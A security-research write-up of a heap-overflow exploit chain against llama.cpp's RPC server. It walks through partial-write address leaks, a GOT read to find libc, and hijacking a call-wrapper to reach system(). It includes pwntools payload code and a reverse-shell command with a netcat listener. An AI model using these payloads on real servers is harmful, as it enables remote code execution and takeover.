Note that targeting memset_tensor / set_tensor / get_tensor for partial writing is possible (I did spend a while looking for practical ones). However, their arguments are less controllable (there is internal processing of the parameters) and, most importantly, they don't really return anything - thus not the best candidates for the leaking process.
Looking into gdb, we can see that the pointer for ggml_backend_cpu_buffer_get_base (buffer->iface->get_base) is located at 0x7ffff7e7b19c, inside the ggml/src/libggml-base.so DLL at offset 0x1319c. Given the previously introduced limitations of partial writing, our maximum accepted gadget offset will be within the range of 0x13fff.
Following the call chain of the RPC-invokable get_base (RPC_CMD_BUFFER_GET_BASE -> server.buffer_get_base -> ggml_backend_buffer_get_base -> buffer->iface.get_base(buffer); -> ggml_backend_cpu_buffer_get_base), with only request.remote_ptr (ggml/src/ggml-rpc/ggml-rpc.cpp:804) passable into the ggml_backend_buffer_get_base function as rdi, we have to find a method in libggml-base.so, near the offset 0x1319c, that takes an address as a parameter while returning a proper DLL-loaded address.
Since the passed address must be a valid buffer address (buffer is examined via if (buffers.find(buffer) == buffers.end()) {, ggml/src/ggml-rpc/ggml-rpc.cpp:805 - we can't just pass in an arbitrary heap address that we know via alloc_buffer), and there are few methods whose purpose is to return an address from a pointer, I started looking for getters in ggml/src/ggml-backend.cpp, within roughly 1700 lines of the original definition of ggml_backend_cpu_buffer_get_base (this did take me more than a while), and I found this interesting getter - ggml_backend_buffer_type_t ggml_backend_buffer_get_type(ggml_backend_buffer_t buffer):
ggml_backend_buffer_type_t ggml_backend_buffer_get_type(ggml_backend_buffer_t buffer) {
return buffer->buft;
}
In the first few rounds of researching ggml/src/ggml-backend.cpp, the chance of buffer->buft being an informational leak was ignored, since it really looks like buffer->buft just points to a management-sort-of chunk on the heap. Nevertheless, it was later noticed that buffer->buft is actually a ggml_backend_buffer_type! (ggml_backend_buffer_type_t -> ggml_backend_buffer_type), pointing to the static ggml_backend_cpu_buffer_type::ggml_backend_cpu_buffer_type object in ggml/src/ggml-backend.cpp at offset +0xb20 (0x4ab20)! A valid DLL-loaded address! (The name of this method is confusing enough: while it says it returns the type of the ggml_backend_buffer, it actually returns a reference to the type structure.)
It seems that even though ggml_backend_buffer_get_type and ggml_backend_cpu_buffer_get_base are 1700 lines away from each other, they are still loaded at pretty adjacent addresses, with a difference of 0x7c1. (Note that we are not calculating the difference between ggml_backend_buffer_get_base and ggml_backend_buffer_get_type, since it is actually ggml_backend_cpu_buffer_get_base that is bound to the targeted iface->get_base pointer.) 0x7c1 is a really proper offset, theoretically the best target for partial writing, because the DLL is aligned to 0x1000 as we mentioned previously. However, re-mentioning the Paradox-of-Partial-Writing part: since we cannot write just half a byte (not with the overflow we have), we still have to guess half a byte - but we are guaranteed to guess right within a maximum of 16 attempts, which is pretty nice for pwn exploitation, since most canary brute-forcing or heap spraying requires far more attempts!
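In code, the guess space for those two bytes looks like this (0x1319c and 0x7c1 are the offsets measured above):

import struct

GET_BASE_OFF = 0x1319c                # iface->get_base -> ggml_backend_cpu_buffer_get_base
TARGET_OFF   = GET_BASE_OFF + 0x7c1   # ggml_backend_buffer_get_type

# The two bytes we write are (base + TARGET_OFF) & 0xffff. Bits 0-11 come
# straight from TARGET_OFF thanks to the 0x1000 alignment; bits 12-15 also
# depend on the unknown base, so that single nibble is brute-forced:
for nibble in range(16):
    low2 = struct.pack("<H", (nibble << 12) | (TARGET_OFF & 0xfff))
    # ...re-run the 282-byte overflow so its final two bytes are `low2`,
    # then call RPC_CMD_BUFFER_GET_BASE: a sane response means we guessed right.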
ggml_nbytes: ne[] + nb[] = ?
Now we have a victim/destination and a target/manipulation for partial writing; the only remaining requirement for the leak is finding the right combination of ne[] / nb[] for the Tensor, to overflow the right place at the right time, in order to partially write those essential bytes of buffer->iface->get_base.
Calculating the distance from dst->data (the memcpy destination) to (dst->buffer)+8(size_t)+2 (we used subtraction since the heap grows upward), the offset required for us to overwrite the last two bytes (LSB) of the iface->get_base pointer is 282, 0x11a.
While we introduced a few parts of the implementation of ggml_nbytes() in the Prerequisites part, we didn't really delve into the details of its size calculation. For partial writing, we must control the overflown byte count very carefully (God, I really like to repeat things!); as a reminder, this is how ggml_nbytes() is calculated:
size_t ggml_nbytes(const struct ggml_tensor * tensor) {
size_t nbytes;
const size_t blck_size = ggml_blck_size(tensor->type);
if (blck_size == 1) {
nbytes = ggml_type_size(tensor->type);
// #define GGML_MAX_DIMS 4
for (int i = 0; i < GGML_MAX_DIMS; ++i) {
nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
}
}
else {
nbytes = tensor->ne[0]*tensor->nb[0]/blck_size;
for (int i = 1; i < GGML_MAX_DIMS; ++i) {
nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
}
}
return nbytes;
}
As the tensor->ne[i] (shape) and tensor->nb[i] (stride) arrays are fully controllable, and blck_size is partially controllable (determined by the type's own properties), the returned nbytes is basically calculated as tensor->ne[0]*tensor->nb[0]/blck_size plus the sum of (tensor->ne[i] - 1)*tensor->nb[i] over i = 1..3 (with a separate branch when blck_size == 1, possibly an optimization for dealing with great numbers of tensors).
This calculation is sometimes a pain in the butt when lots of adjustments happen in the buffer->context / buffer structure, thus we created this tool -> Protosec-Research/ggml-nbytes.
It first creates a rainbow table that maps the shape, strides, and type_traits[type].blck_size to the corresponding nbytes (this is a relatively small computation; generating a 254 KB table takes less than a few seconds). With the generated rainbow table, you can then directly look up the proper shape / dimensions / strides for a specified nbytes.
Since we have a tensor->type of 2, i.e. a ggml_blck_size(tensor->type) of 0x20, we found the ggml_nbytes array parameters ne[] = {32*3,32*3,32*3,63}, nb[] = {10,1,1,1}. This gives a size of ((32*3)*10//32)+((32*3-1)*1)+((32*3-1)*1)+(63-1)*1 -> 30+95+95+62=282, exactly the offset we are looking for. For now, we just need to construct the Tensor src using these parameters, while using set_tensor to fill the source data with our specific payload. (Remember not to corrupt the header information of chunk dst->buffer; in this case we need to place the chunk header at payload offset 248, as mentioned before.)
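A quick Python mirror of ggml_nbytes() (the C code above) sanity-checks the chosen parameters; blck_size is 32 for type 2 per type_traits, and type_size only matters on the blck_size == 1 branch:

def ggml_nbytes(ne, nb, blck_size, type_size=1):
    if blck_size == 1:
        return type_size + sum((ne[i] - 1) * nb[i] for i in range(4))
    nbytes = ne[0] * nb[0] // blck_size
    return nbytes + sum((ne[i] - 1) * nb[i] for i in range(1, 4))

assert ggml_nbytes([32*3, 32*3, 32*3, 63], [10, 1, 1, 1], 32) == 282  # 30+95+95+62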
We manipulated iface->get_base's lower two bytes with our payload (b'aaaa's) without interfering with the rest of the pointer. Now we just need to point this part of the pointer at ggml_backend_buffer_get_type, then trigger the original buffer_get_base call chain (RPC_CMD_BUFFER_GET_BASE -> server.buffer_get_base -> ggml_backend_buffer_get_base -> buffer->iface.get_base(buffer); -> ggml_backend_cpu_buffer_get_base) through the RPC endpoint; the return value of the redirected ggml_backend_buffer_get_type is returned as part of the response variable in ggml-rpc.cpp, and we can retrieve it through the socket RPC connection.
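With the partial write landed, the leak itself is one more RPC round-trip; a sketch reusing the hypothetical helpers from earlier (0x4ab20 is the object offset measured above):

# get_base now dispatches to ggml_backend_buffer_get_type, which returns
# buffer->buft: a pointer to the static cpu-buffer-type object inside
# libggml-base.so's data segment (offset 0x4ab20 in this build).
leak = buffer_get_base(sock, dst_buf)   # hypothetical helper: RPC_CMD_BUFFER_GET_BASE
ggml_base = leak - 0x4ab20
print("libggml-base.so base:", hex(ggml_base))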
Here we successfully leaked an address via ggml_backend_buffer_get_type (ignoring the misalignment). As mentioned previously, this is a libggml-base.so loaded DLL address; by calculating its fixed offset to the base (we used two variables in exp.py, ggml_base and ggml_begin, because vmmap and pwntools' ELF() interpretation are based on different bases - the vmmap mapping in pwndbg is segmented into three parts), we now have the libggml-base.so base address. This allows us to redirect the execution flow to arbitrary methods loaded in libggml-base.so, which furthermore allows us to:
1. Fake the buffer->iface structure method pointers with original DLL addresses, to avoid any malfunction / unexpected corruption of the buffer structure; this lets us explore the possibilities of the buffer->context pointer and mess with the paradox-of-overflow.
2. Calculate the got address of a function loaded in the DLL.
Here the first ability, the leak of libggml-base.so, is the most essential to us, since (re-explaining and repeating) the sanitization/patches for the previous exploitations are based on buffer_get_base and buffer_get_size; by manipulating the buffer->context pointer, we can bypass and re-establish the read-what-wheres and write-what-wheres introduced previously. And by leaking the ggml library's loaded memcpy GOT entry, we can find this method's reference into its standard library - and here, we are going to construct our second leak.
If you wonder why we need to leak another library: in order for us to receive a reverse shell via the heap-overflow, where we don't have direct control over an rwx segment as we do in stack-overflows, the best way is to execute commands via system() and pass a command-storing address as the argument - except system()-class methods are neither directly loaded in this DLL nor called previously in the program (lazy binding). So the only way for us to reference them is via the standard DLLs such as libc.so.6. (By the way, I really don't like to say DLL, since it sounds like a thing people say only in the context of Windows, but I consider it a bit confusing to say libc all the time since two DLLs are mentioned in this write-up, so why not?)
Leak No.2: Paradox-of-Overflow, GOT Tables.
Compared to leak No.1, leak No.2 is comparably simpler. To leak the libc.so.6 base address, the best way is to break the Paradox-of-Overflow we mentioned previously - easily solved now that we have a full leak of the libggml-base base address: the fake buffer->context, the final objective in our Paradox-of-Overflow, can be manipulated without any effect on the functioning pointers.
The key here is to use the RPC-native ggml_backend_cpu_buffer_get_tensor to leak a GOT value that tells us the libc base. By looking into ELF('lib-ggml.so')'s .got references, we can find our favorite, .got['memcpy'] - we chose memcpy not because it's our favorite, but rather because it has already been called previously, so we can directly leak its DLL address without dl_runtime_resolve and lazy-binding whatever;
To begin with, we first construct a fake ggml_backend_buffer table (the buffer->iface structure) using the known ggml_base address + the known fixed offsets of the methods; the only trick here is to keep free_buffer as NULL and leave buffer->size the same as it was. memcpy's GOT address can be calculated as the ggml_begin address + ggml.got['memcpy'].
ggml = ELF('./libggml-base.so', checksec=False)
payload = flat({
248:[
fake_ggml_backend_buffer_table(
free_buffer = 0,
get_base = ggml_base + get_base_offset,
init_tensor = ggml_base + init_tensor_offset,
memset_tensor = ggml_base + memset_tensor_offset,
set_tensor = ggml_base + set_tensor_offset,
get_tensor = ggml_base + get_tensor_offset,
cpy_tensor = ggml_base + cpy_tensor_offset,
clear = ggml_base + clear_offset,
reset = ggml_base + reset_offset,
buft = 0x0,
context = ggml_begin + ggml.got['memcpy'] - 0x30,
size = 0x110,
usage = 0x0,
),
p64(0x111)
]
})
Notice here how we changed the buffer->context pointer to ggml.got['memcpy']-0x30. As mentioned, p0 = (size_t) ggml_backend_buffer_get_base(tensor->buffer) is eventually just a wrapper for buffer->context; changing p0 simply defeats the entire request.tensor.data + request.offset < p0, request.tensor.data + request.offset >= p0 + buffer->size patch that we mentioned at ggml/src/ggml-rpc/ggml-rpc.cpp:924. We left a 0x30 gap below the context pointer to leave a little chunky room for the p0 examinations.
Now, all we have to do is call ggml_backend_cpu_buffer_get_tensor on this manipulated buffer structure. Because we left the beloved free_buffer as NULL, this buffer will never be freed; and since we changed buffer->context, the RPC sanitization believes we are trying to read a legit alloc_buffer-allocated context address, vomiting out its content:
The content of memcpy[got] leaked! (Since we specified the size in ggml_backend_cpu_buffer_get_tensor, only 0x8 bytes of data are vomited; you can output as much of the GOT table as you want, of course.) (Here libc.so.6 maps such a wide range of addresses - memcpy is located at offset 0x1a12c0 from the libc.so.6 base; we are pretty lucky that libggml-base.so spans such a small range, which allowed us to exploit partial writing.)
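From here, recovering the libc base is plain pointer arithmetic; a sketch, where got_leak stands for the bytes returned by the forged get_tensor read:

from pwn import ELF, u64

libc = ELF('./libc.so.6', checksec=False)
leaked_memcpy = u64(got_leak[:8])       # the 8 bytes read out of memcpy's GOT slot
libc_base = leaked_memcpy - libc.symbols['memcpy']   # 0x1a12c0 in this build
print("libc base:", hex(libc_base))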
With the leak of libc.so.6, we can access a considerable set of methods that can help us, such as system(), execve(), syscall(), and one_gadgets that could lead to a direct bin/sh connection. However, achieving remote code execution on the server isn't as easy as it seems.
Remote-Code Execution: New paradox, Structure-Oriented Programming?
Remote code execution, even now with the mitigations on the write-what-wheres / read-what-wheres bypassed, is still not easy to achieve. Previous exploitation write-ups on Llama.cpp were created before the mitigations were implemented; that allowed them to pass arbitrary things into the buffer->iface methods exposed by the RPC server, and changing the buffer->iface pointers was enough for them to RCE.
However, we are dealing with a much harder (or rather, more secure) version of Llama.cpp; we can no longer mess with things that freely, since checks are implemented everywhere. The past exploitations don't work anymore, as Llama.cpp checks whether a passed-in buffer pointer belongs to the globally managed buffers; passing in an external pointer will just set the pointer to NULL. In the meantime, you can't just redirect the execution flow to one_gadgets: we are not dealing with CTF challenges that simply route stdin/stdout to/from the ELF - executing /bin/sh won't really do anything (probably suspend the process, and that's all?). We need to execute custom commands to establish a shell connection.
Fortunately, the past exploitation methodology from NullPointerNoException still works: we can call an arbitrary method with a manipulated rdi (first parameter). But this still leaves us a lot of limitations.
Most of the time that we have control over the execution flow with a controllable argument, we will try to find a call-wrapper (one that invokes another method with parameters derived from its own argument; for example, ggml_backend_alloc_buffer is a call-wrapper for ggml_backend_buft_alloc_buffer(ggml_backend_get_default_buffer_type(backend), size)).
Nevertheless, first: we say that we have control over rdi, but we actually only have partial/selective control over it. As we introduced with the buffers examination, the passed-in rdi must be a globally managed buffer structure stored in buffers[]. In the meantime, call-wrappers usually wrap the argument itself (call another method, passing in the original argument); it is impossible to find an ideal call-wrapper that does something ROP-ish that we want, such as call rdi+0x10, then pass rdi+0x20 as the argument - at least impossible in libggml-base.so and most DLLs the RPC server loads, whose source code I went through.
Heads-up: we can't just edit the globally stored buffers[] - it's stored globally to begin with, and we would need to leak its address to modify it with the bypassed write-what-wheres; that's very sad.
And the thing about buffer structures is, as controllable as they are to us, the first member - free_buffer - of the buffer we pass as the argument is limited and not fully controllable: it must be a valid pointer address or NULL. And most (every) of the times we try to call system() for a shell, that pointer would point to some address holding data (for example, the commands we want to execute) that doesn't contain valid instructions and isn't executable at all. (It would be another story if we could find an actual rwx segment whose address we know, but re-stating: that would be a totally different story.)
This is what I noted during the exploitation:

- bin/sh won't work at all; we are on a self-designed rpc socket system, not one of those CTF contests that directly monitor stdout / stdin.
- rdi must be a buffer address included in the global buffers list (managed during alloc_buffer / free_buffer); we can't fake a buffer structure.
- buffers is somewhere we don't know; sadly, you can't leak it.
- Although we can control buffer->iface's pointers, we must leave buffer->iface->free_buffer as nullptr / a valid address to avoid crashes during the backend_buffer_free right after the overflow; we can't point buffer->iface->free_buffer at a data address that's not executable. (This implicitly restates the limitation on passing buffer as an argument, i.e. on buffer->iface->free_buffer, the very first member of the buffer structure.)
Therefore, for us to successfully achieve RCE in a context with such limitations, we have to find a way for the RPC server to somehow interpret one buffer-based address as the called method, and another buffer-based address as the argument - and neither of these can be buffer itself, since the first element is not-mess-around-able. The best way to do that is via Structure-Oriented Programming. And the final payload we got is seemingly fascinating.
Structure-Oriented Programming: World-of-Offsets, Four layers call-chain, Perspectives
To begin with, we all must have heard of the operator '->' in cpp / c (not sure if this is a c-only thing); if not, I wonder how you possibly read this far *(or you probably just jumped to this section).
At the beginning, I always thought of this as a member indicator to access class members, used so commonly in our OOP world. However, at a certain point in your life, some special someone (I hope this special someone is not me) will tell you: all member indicators are, eventually, just offsets. That is when you finally start to understand the truth of life and binary exploitation, and unlock one of the best things in binary exploitation (except gdbing) - messing with structures. With that being said: Structure-Oriented Programming.
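A tiny Python/ctypes analogue of that "members are offsets" view; the field names and layout here are illustrative, loosely echoing the structures in this write-up:

import ctypes

class Iface(ctypes.Structure):
    _fields_ = [("free_buffer", ctypes.c_void_p),   # +0x00
                ("get_base",    ctypes.c_void_p)]   # +0x08

class Buffer(ctypes.Structure):
    _fields_ = [("iface",   Iface),                 # +0x00
                ("buft",    ctypes.c_void_p),       # +0x10 here
                ("context", ctypes.c_void_p)]       # +0x18 here

# '->member' compiles down to 'base address + constant offset':
print(Buffer.buft.offset, Buffer.context.offset)    # 16 24

# Reinterpret the same bytes under a different structure definition and you
# simply read different offsets - the essence of structure-oriented programming:
class Backend(ctypes.Structure):
    _fields_ = [("guid",   ctypes.c_void_p),
                ("iface0", ctypes.c_void_p),
                ("device", ctypes.c_void_p)]
print(Backend.device.offset)                        # 16: same bytes, new meaning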
Despite the fact that our argument is required to be a buffer structure, which seems impossible to exploit, no one says it must be interpreted as a buffer structure - and that's the key for us to construct the final step: remote code execution. Even though we do not have that much control over buffer, we can try to have the call-wrappers interpret it as something else, producing unexpected results.
ggml_backend_t && ggml_backend_dev_t:
ggml_backend_t and ggml_backend_dev_t are two structures we haven't mentioned at all before; in fact, a ggml_backend_dev_t is included in the ggml_backend structure as ggml_backend->device:
struct ggml_backend {
ggml_guid_t guid;
struct ggml_backend_i iface;
ggml_backend_dev_t device;
void * context;
};
struct ggml_backend_device {
struct ggml_backend_device_i iface;
ggml_backend_reg_t reg;
void * context;
};
A GGML backend is an abstraction layer that provides a unified interface for executing machine learning computations across different hardware devices (like CPU, GPU, or other accelerators). It handles all device-specific operations including memory management (allocation, transfers, and synchronization), computation execution (both synchronous and asynchronous), tensor operations, and event handling for synchronization between operations. Each backend implementation (such as CUDA, Metal, or Vulkan) follows a standard interface while providing device-specific optimizations, allowing the GGML framework to seamlessly work with different hardware while maintaining a consistent API, with automatic fallback to CPU if specialized hardware is unavailable.
For every ggml_backend thread, there is a ggml_backend structure that manages it. Both ggml_backend and ggml_backend_device carry an iface table, similar to our buffer structure (I didn't paste those tables since they would take up too much space). We don't need to know how ggml_backend / ggml_backend_device work in as much detail as we did for buffer, but understanding their basic layout is essential - very essential.
You might wonder why we are mentioning them now; we never referenced or saw these structures anywhere earlier in this write-up. The reason we brought them up is connected with our Structure-Oriented Programming journey.
Perspectives and interpretations
While researching usable call-wrappers under the constraint of rdi having to be a buffer structure, nothing helpful was found at all, despite the entirety of ggml_backend.c / ggml_backend.h being reviewed. (Pretty much every call-wrapper is useless: either it passes a meaningless argument into a controllable buffer->iface pointer after its internal logic, or the buffer offset it uses is not controllable.) This is very sad; however, as the research went further, an interesting method popped out that gave us a little hope of success:
size_t ggml_backend_get_alignment(ggml_backend_t backend) {
return ggml_backend_buft_get_alignment(ggml_backend_get_default_buffer_type(backend));
}
Here, ggml_backend_get_alignment is what we are talking about - now you might understand why I introduced the backend structure to you. However, it is still not a sure thing, since it only looks like a doubly-nested call-wrapper taking a backend into the methods. This wrapper has three parts that we might be interested in: ggml_backend_buft_get_alignment, ggml_backend_get_default_buffer_type, and the internal ggml_backend_dev_buffer_type method; for now, let's focus on the ggml_backend_get_default_buffer_type-related implementations.
ggml_backend_buffer_type_t ggml_backend_get_default_buffer_type(ggml_backend_t backend) {
return ggml_backend_dev_buffer_type(backend->device);
}
ggml_backend_buffer_type_t ggml_backend_dev_buffer_type(ggml_backend_dev_t device) {
return device->iface.get_buffer_type(device);
}
These are the two most essential lines of implementation for our structure-oriented programming section. ggml_backend_get_alignment calls ggml_backend_get_default_buffer_type to produce the parameter for ggml_backend_buft_get_alignment, passing its own parameter backend into the callee ggml_backend_get_default_buffer_type. Inside ggml_backend_get_default_buffer_type, ggml_backend_dev_buffer_type is called to produce the return value, with backend->device passed as the argument; ggml_backend_dev_buffer_type in turn calls device->iface.get_buffer_type(device) with that argument.
This sounds really confusing, but it is much less complex when reading the original call chain. If I list all the final calls and their parameters, here is how it goes:
Called ggml_backend_get_alignment:
- Calls ggml_backend_buft_get_alignment; argument: ggml_backend_get_default_buffer_type(backend) (we are ignoring this part here)
- Calls ggml_backend_get_default_buffer_type; argument: backend
- Calls ggml_backend_dev_buffer_type; argument: backend->device
- Calls device->iface.get_buffer_type (backend->device->iface.get_buffer_type); argument: device (backend->device)
How interesting is that! This is a 4-layer nested call chain: the backend parameter at the beginning is passed all the way down into the final method call, backend->device->iface.get_buffer_type, and that call's parameter is itself a backend member (device, i.e., backend->device)!
Recall our introduction to the backend structure: its first member is ggml_guid_t guid (typedef uint8_t ggml_guid[16] - 16 uint8_t's). This member is never touched in the nested call chain, which saves us from fighting the partially-uncontrollable buffer->iface->free_buffer pointer. The only member we are required to manipulate is the backend->device structure; luckily, the pointer that manipulation needs, backend->device->iface->get_buffer_type, happens to be the 7th member of the device structure, which means whatever data lands at the start of backend->device (its first member) will not conflict with our exploitation.
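To make the chain concrete, here is a toy re-enactment (a sketch: the flat-memory model and both offsets are my assumptions, chosen only to mirror the struct layouts above) of the raw reads the 4-layer chain performs once backend is really our forged buffer:
# Toy flat memory: address -> qword; read64 stands in for the CPU's dereference.
mem = {}
def read64(addr): return mem[addr]

DEVICE_OFF   = 0x38    # assumed offset of backend->device (guid + embedded iface)
GET_BUFT_OFF = 6 * 8   # assumed: get_buffer_type is the 7th iface pointer

backend, device, system = 0x1000, 0x2000, 0x7f0000001337   # made-up addresses
mem[backend + DEVICE_OFF]  = device    # forged backend->device
mem[device + GET_BUFT_OFF] = system    # forged device->iface.get_buffer_type

fptr = read64(read64(backend + DEVICE_OFF) + GET_BUFT_OFF)
arg  = read64(backend + DEVICE_OFF)    # the argument is device itself
assert (fptr, arg) == (system, device) # i.e. the chain ends in system(device)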
What this means is that if the buffer structure is forged as a backend structure containing a validly-forged device structure (importantly, a properly forged device->iface table), we are able to call a manipulable pointer with a manipulated parameter: we call buffer->device->iface->get_buffer_type, with buffer->device as the parameter.
This requires a little bit of calculation when forging the backend arrangement on top of the original buffer (this is still based on overflowing into buffer from buffer->context, so not corrupting the chunk header remains important). It can easily be done by studying the backend structure, or by sending pwntools' cyclic() as the payload and observing the structural arrangement with gdb's p/x *(ggml_backend) address:
payload = flat({
    # offset 0: start of buffer->context, which doubles as the forged device;
    # a scratch qword, then the command string system() will receive
    0: [
        p64(0xdeadbeef),
        cmd,
    ],
    # offset key apparently left in from the cyclic() probe ('oaaapaaa'): this
    # is where device->iface.get_buffer_type landed, now pointed at system()
    0x616161706161616f: [p64(system)],
    # offset 248: the fake buffer table that overlays the original structure
    248: [
        fake_ggml_backend_buffer_table(
            free_buffer = 0,                                    # must stay NULL to survive the free path
            get_base = ggml_base + ggml_backend_get_alignment,  # hijacked into the call-wrapper
            init_tensor = 0xdeadbeef,
            memset_tensor = 0xdeadbeef,
            set_tensor = 0xdeadbeef,
            get_tensor = 0xdeadbeef,
            cpy_tensor = 0xdeadbeef,
            clear = 0xdeadbeef,
            reset = 0xdeadbeef,
            buft = 0xdeadbeef,
            context = 0xdeadbeef,
            size = 0x110,
            usage = 0,
        ),
        p64(0x111),                             # heap chunk size field left intact (0x110 | PREV_INUSE)
        p64(manipulated_buffer_base_3 + 0x10),  # forged backend->device, pointing into the forged device
    ]
})
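The fake_ggml_backend_buffer_table helper isn't reproduced in this write-up (it lives in the gist), but a plausible sketch - assuming it simply packs the nine ggml_backend_buffer_i function pointers in declaration order, followed by the buft / context / size / usage tail of the buffer structure - would be:
from pwn import p64

def fake_ggml_backend_buffer_table(**members):
    # Assumed layout: the 9 iface function pointers in declaration order,
    # then buft, context, size, usage - one qword each.
    order = ("free_buffer", "get_base", "init_tensor", "memset_tensor",
             "set_tensor", "get_tensor", "cpy_tensor", "clear", "reset",
             "buft", "context", "size", "usage")
    return b"".join(p64(members[name]) for name in order)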
Converting the theoretical exploitation into reality needs an extra bit of consideration and a few tricks. To begin with, we do not replace the original buffer structure yet, since (at this point) we still depend on the buffer->iface pointer manipulations to redirect the execution flow. The trick here is that we forge the backend->device structure inside buffer->context (or you might call it the base), and forge the backend->device pointer inside the backend structure overlaid on buffer. On one hand this gives us more room; on the other it is necessary, since backend->device will be dereferenced as a pointer. On top of this, we make the start of buffer->context - which becomes backend->device upon re-interpretation - serve as the parameter stored at the dereferenced backend->device address, and we plant buffer->device->iface->get_buffer_type at its proper offset into that device structure, this time inside buffer->context (in other words, it becomes (ggml_backend_buffer) buffer->context (ggml_backend) ->iface->get_buffer_type):
This is what the memory layout should look like, buffer-based (even though gdb labels it backend, that's because this breakpoint is set inside ggml_backend_get_alignment, after the control-flow hijack), passed in using the same methodology from the hijacked get_base. This is all about leaving the original structure in place while allowing re-interpretation and messing with pointers and offsets. Here we pointed backend->device->iface->get_buffer_type at system(), using the libc.so.6 address we computed after leaking libggml-base.so via partial writes, and pointed the forged backend->device at the context address where we wrote the argument for the hijacked call - in this case, the command we want system() to execute.
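To visualize the double interpretation, here is a self-contained sketch (all addresses and offsets are illustrative assumptions; the real exploit uses the leaked values and the layout probed with cyclic(), and places the command after a scratch qword): the same bytes serve both as system()'s argument and as the fake device whose 7th iface slot is the function pointer:
from pwn import p64, flat

system_addr = 0x7f0000052290     # made-up "leaked" libc system() address
device_addr = 0x55555560a010     # made-up address where buffer->context lands

cmd = b"sh -i >& /dev/tcp/127.0.0.1/1337 0>&1\x00"
assert len(cmd) <= 0x30          # the command must stop short of the fptr slot

fake_device = flat({
    0x00: cmd,                   # device base doubles as system()'s char * argument
    0x30: p64(system_addr),      # assumed slot of iface.get_buffer_type (7th qword)
})

# The overlaid backend's ->device field simply stores device_addr, so the
# 4-layer chain resolves to (*(device_addr + 0x30))(device_addr) == system(cmd).
backend_device_slot = p64(device_addr)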
After finishing all of this, plus the heap arrangement and related operations in exp.py, the moment this buffer's get_base is called again, the final objective - remotely specified code - is executed on the RPC Server.
Looking back at the exploitation process, with all the Paradox-of-Overflow, Paradox-of-Partial-Writing, and the structural constraints we encountered, we were still able to achieve Remote Code Execution by chaining these techniques. Despite the stringent memory checks, custom heap management, and multiple mitigations implemented in Llama.cpp, we navigated through these challenges with careful analysis and creative problem-solving! From identifying the heap-overflow vector hidden in ggml_backend_cpu_buffer_cpy_tensor, to exploiting the NullPointerNoException, to finally deploying Structure-Oriented Programming, each step required a little patience (as well as luck, lol) and taught me a little. I am glad to have made it here - what a magical exploitation it is!
Exploitation: The Realistic Implementation, and exp.py
Here is the final version of exp.py (since it takes up too much space, I decided not to paste it here; it will be in a gist). Eventually you will have to convert these exploitation ideas into a realistic interaction with llama.cpp. I will explain how each exploitation step is implemented. (Notice that the implementation of the RPC communication protocol is omitted; I don't want to spend space and time explaining llama.cpp's RPC Protocols - you should be able to figure that out yourself.)
1. To begin with, before starting any exploitation process, we first allocate the required buffers using alloc_buffer, then retrieve each one's buffer->context using the get_base buffer->iface method. Notice how we arrange the size of each chunk to maximize the size of the input (the overflow payload): written_buffer serves as the src of the cpy_tensor operations, while manipulated_buffer is the cpy_tensor dst being overflowed. We need to overflow 3 times during the exploitation (the first time leaking libggml-base.so, the second time leaking libc.so.6 via the mitigation bypass, the last time overflowing to forge the backend structure and use the call-wrappers). There is still some unreasonable behavior in the heap arrangement that we cannot explain: for example, we must allocate three padding buffers after manipulated_buffer_2, or written_buffer_3 ends up adjacent to two freed buffers despite our allocating new ones afterwards, which leaves us unable to set_tensor written_buffer_3 for further exploitation; meanwhile, we need to allocate a buffer_list left over from a deprecated, previously failed exploitation - if I remove it, the arrangement just goes wrong. (This is weird and not yet explainable.)
2. Then we partial-write the lowest two bytes of the buffer->iface->free_buffer pointer to ggml_backend_buffer_get_type, leaking libggml-base.so by leaking out the buffer->buft address, which sits in libggml-base.so's vmmap range. Notice how we manually construct the src tensor: partial writing demands special ne[] / nb[] calculations that we must pay attention to. We first set the payload into the written_buffer_base buffer, then call cpy_tensor to overflow the dst tensor with the src tensor - this is also why we requested a small size for manipulated_buffer_base. pwntools' native io.recvn(0x18) is used to receive a fixed-size socket response; we still have to align / bit-transform the received libggml-base.so ggml_backend_cpu_buffer_type pointer. Furthermore, with that received pointer we can calculate the DLL addresses of the remaining buffer->iface components. (A minimal sketch of this leak step follows after this list.)
3. With the ggml_base address calculated from the partial-writing technique, we are able to forge the fake_ggml_backend_buffer_table, breaking the paradox-of-overflow: we fake the buffer->context address to bypass the earlier p0/p1 mitigations on the get_tensor boundary. We leak ggml.got['memcpy'] to obtain the GOT addresses and, from them, the libc.so.6 address. After the partial-writing stage we no longer need to aim for a specific nbytes size; however, we must make sure nbytes is not too big, or it might unexpectedly overflow the succeeding chunks. (See the second sketch below for the libc computation.)
4. With the libggml-base.so and libc.so.6 addresses known, we finally forge a backend/buffer structure that is interpretable as a buffer structure while we steer the control flow to the buffer->iface->get_base call, and as a backend structure when we invoke the ggml_backend_get_alignment call-wrapper for the 4-layer call chain. We create a structure with buffer->iface->get_base = ggml_backend_get_alignment, backend->device = buffer->context, and backend->device->iface->get_buffer_type = system(), writing the first parameter of the jmp-ed system() into backend->device. ggml_backend_get_default_buffer_type(backend) then triggers backend->device->iface->get_buffer_type with parameter backend->device - in this case buffer->context->iface->get_buffer_type (system) with backend->device as the argument. In the exploitation we set up the reverse-shell command sh -i >& /dev/tcp/127.0.0.1/1337 0>&1\x00, creating a reverse-shell connection via sh to 127.0.0.1:1337.
5. Listen on 127.0.0.1:1337 with nc -lvp 1337; a reverse-shell connection will be received after the payload executes.
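Here is the promised sketch of step 2's partial-write leak. Everything RPC-side is elided, and PAD, GET_TYPE_LOW2, and the symbol offset are placeholders I made up, not values from the exploit:
from pwn import p16, p64, u64, flat

PAD = 0x88               # assumed distance from our overflow start to iface->free_buffer
GET_TYPE_LOW2 = 0x51c0   # placeholder: low 16 bits of ggml_backend_buffer_get_type

# Only two bytes past PAD are written, so the upper, randomized bytes of the
# original free_buffer pointer survive - that is the partial write.
overflow = flat({PAD: p16(GET_TYPE_LOW2)})

# After cpy_tensor fires this overflow and the hijacked iface entry runs, the
# RPC response carries a libggml-base.so pointer back; parsing looks like this
# (a canned 0x18-byte response stands in for io.recvn(0x18)):
resp = b"\x00" * 0x10 + p64(0x7f12345675c0)
leaked = u64(resp[0x10:0x18])
ggml_base = leaked - 0x1675c0   # assumed offset of ggml_backend_cpu_buffer_type
print(hex(ggml_base))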
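And a sketch of step 3's libc resolution, assuming local copies of the target's libraries so pwntools can resolve the offsets (the canned leak bytes are made up, and ggml_base carries over from the previous sketch):
from pwn import ELF, u64

libggml = ELF("./libggml-base.so")   # local copy of the target's library
libc    = ELF("./libc.so.6")

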